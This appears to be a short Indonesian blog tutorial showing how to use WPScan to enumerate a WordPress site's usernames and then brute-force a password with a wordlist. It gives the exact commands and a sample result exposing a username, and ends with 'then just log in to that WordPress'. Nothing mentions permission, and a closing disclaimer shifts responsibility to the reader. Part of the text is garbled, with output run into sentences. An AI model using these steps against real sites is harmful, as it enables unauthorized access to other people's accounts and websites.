Sudah Mengenal Wpscan? Wpscan adalah sebuah tools yang dibuat itu melakukan tes terhadapat situs situs web yang menggunakan CMS Wordpress, Berikut Adalah Penampakan Aplikasi Wpscan
Wpscan bisa digunakan untuk mendapatkan username cms yang berbasis wordpress, caranya adalah dengan mengetikkan
Sudo wpscan - -url situsmu.co - -enumerate uSeperti Pada Gambar Dibawah ini, Wpscan Akan Melakukan Scanning Secara Automatis dan keseluruhan, termasuk Themes,Plugin, dan Cross-Site Scripting (XSS)
Wpscan Telah Mendapatkan Username Dari Situs Tersebut Yaitu
Dapat Diketahui Bahwa Situs Tersebut Memiliki Username -> "parsisiuntimas" , selanjutnya Kita melakukan dictionary attack, atau brute force attack yaitu dengan mengetikkan+----+----------------------+--------------------------+| Id | Login | Name |
+----+-----------------------+--------------------------+
| 1 | parsisiuntimas | parsisiuntimas |
+----+-----------------------+--------------------------+
Sudo wpscan --url situsmu.co --wordlist /path/listmu.lst --username ygsudahdidapat
Jika Password Telah Di Dapatkan, Maka Tinggal Melakukan Login Ke Wordpress Tersebut.
Terimakasih Sudah membaca tutorial dari saya, maaf bila ada kekurangan, bagi yang memilik pertanyaan bisa langsung bertanya di komentar
nb: BruteForce wordpress membutuhkan wordlist yang akurat dan usahakan wordlist yang dipakai menggunakan bahasa asal web tersebut,
SEGALA YANG ANDA LAKUKAN ADALAH TANGGUNG JAWAB ANDA SENDIRI :)